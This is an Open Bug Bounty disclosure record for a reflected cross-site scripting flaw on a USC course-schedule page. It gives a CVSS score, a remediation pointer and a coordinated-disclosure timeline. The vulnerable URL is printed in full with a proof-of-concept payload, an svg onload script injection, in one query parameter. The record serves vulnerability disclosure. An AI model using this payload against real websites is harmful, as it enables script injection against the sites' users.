web-app.usc.edu XSS vulnerability

2017-12-11T20:04:00
ID OBB:452199
Type openbugbounty
Reporter ut
Modified 2018-03-11T20:04:00

Description

Open Bug Bounty ID: OBB-452199

Description| Value
---|---
Affected Website:| web-app.usc.edu
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://web-app.usc.edu/mobile/soc/20172/section.html?c=Technology+&+Social+Change&p;=WRIT-150&i;=64432%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&t;=20172&n;=This+course+focuses+on+how+technology+both+shapes+and+is+shaped+by+society.+In+our+writing+we+will+analyze+claims+about+technological+innovation+and+develop+original+arguments+about+the+promises,+problems,+ethics,+and+ideologies+of+this+fundamental+condition+of+modern+life.+Areas+for+exploration+include+technological+determinism,+ethical+challenges+to+technology,+political+responses+to+technology,+utopianism,+and+technology%27s+impact+of+various+social+systems,+ranging+from+the+military+to+commerce+to+the+family.&s;=054
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 11 December, 2017 20:04 GMT
Vulnerability Verified:| 11 December, 2017 20:06 GMT
Website Operator Notified:| 11 December, 2017 20:06 GMT
Vulnerability Published:| 11 December, 2017 20:06 GMT[without any technical details]
Public Disclosure:| 11 March, 2018 20:04 GMT